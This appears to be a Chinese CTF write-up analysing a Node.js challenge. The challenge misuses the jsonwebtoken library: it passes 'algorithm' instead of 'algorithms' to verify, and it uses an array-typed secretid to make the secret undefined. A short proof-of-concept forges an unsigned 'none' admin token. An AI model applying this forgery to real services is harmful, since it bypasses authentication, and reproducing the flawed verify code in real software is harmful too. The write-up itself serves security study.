从一道CTF题看Node.JS中的JWT库误用
2020-04-23 18:35:50 Author: www.secpulse.com(查看原文) 阅读量:443 收藏

在一次CTF中遇到了一道和jwt相关的题目,在对nodejs中的jwt库进行分析后,我发现了一个在使用该库时容易掉进去的陷阱。

关键代码:

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
'POST /api/register': async (ctx, next) => {
const {username, password} = ctx.request.body;

if(!username || username === 'admin'){
throw new APIError('register error', 'wrong username');
}

if(global.secrets.length > 100000) {
global.secrets = [];
}

const secret = crypto.randomBytes(18).toString('hex');
const secretid = global.secrets.length;
global.secrets.push(secret)

const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

ctx.rest({
token: token
});

await next();
},

'POST /api/login': async (ctx, next) => {
const {username, password} = ctx.request.body;

if(!username || !password) {
throw new APIError('login error', 'username or password is necessary');
}

const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

console.log(sid)
global.secrets = ['a', 'b']
if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
throw new APIError('login error', 'no such secret id');
}

const secret = global.secrets[sid];

const user = jwt.verify(token, secret, {algorithm: 'HS256'});

const status = username === user.username && password === user.password;

if(status) {
ctx.session.username = username;
}

ctx.rest({
status
});

await next();
},

'GET /api/flag': async (ctx, next) => {
if(ctx.session.username !== 'admin'){
throw new APIError('permission error', 'permission denied');
}

const flag = fs.readFileSync('/flag').toString();
ctx.rest({
flag
});

await next();
},

'GET /api/logout': async (ctx, next) => {
ctx.session.username = null;
ctx.rest({
status: true
})
await next();
}
};

其中jsonwebtoken用的是最新的版本。

如果我们想拿到flag则必须以admin登录,而admin用户是禁止注册的。

1.png

从代码来看,存入session的username是从token中解析来的,而token可控,那么username也有机会控成admin。

注意到这里验证签名的secret是从数组secrets中获取的,而数组的键我们可控。js是弱类型语言,如果sid传入空数组,则可以绕过限制使得secret为undefined。
2.png

另一处细节在于此处对verify()函数的误用:

const user = jwt.verify(token, secret, {algorithm: 'HS256'});

3.png

verify()指定算法的正确方式应该是通过algorithms传入数组,而不是algorithm

在jwt库中,如果没指定算法,则默认使用none

algorithmsnone的情况下,空签名且空秘钥是被允许的;如果指定了algorithms为具体的某个算法,则密钥是不能为空的。
4.png

所以,此处由于对该函数的错误使用,导致我们可以用none伪造jwt。
POC:

const jwt = require('jsonwebtoken');

var payload = {
secretid: [],
username: 'admin',
password: '1'
}
var token = jwt.sign(payload, undefined, {algorithm: 'none'});
console.log(token);

签名是用algorithm,验证签名是用algorithms,这里很容易让人混淆。

最后带上账号密码登录,即可获得admin用户的cookie,
5.png

  • js是弱类型语言

    • [] == 0

    • [] == ''

    • [2] == 2

  • nodejs中的jwt库在签名时用algorithm指定算法,而在验签时用algorithms指定算法

  • 在测试jwt相关的安全问题时可以使用burpsuite的JOSEPH插件辅助测试

本文作者:少林功夫好啊

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/129304.html


文章来源: https://www.secpulse.com/archives/129304.html
如有侵权请联系:admin#unsafe.sh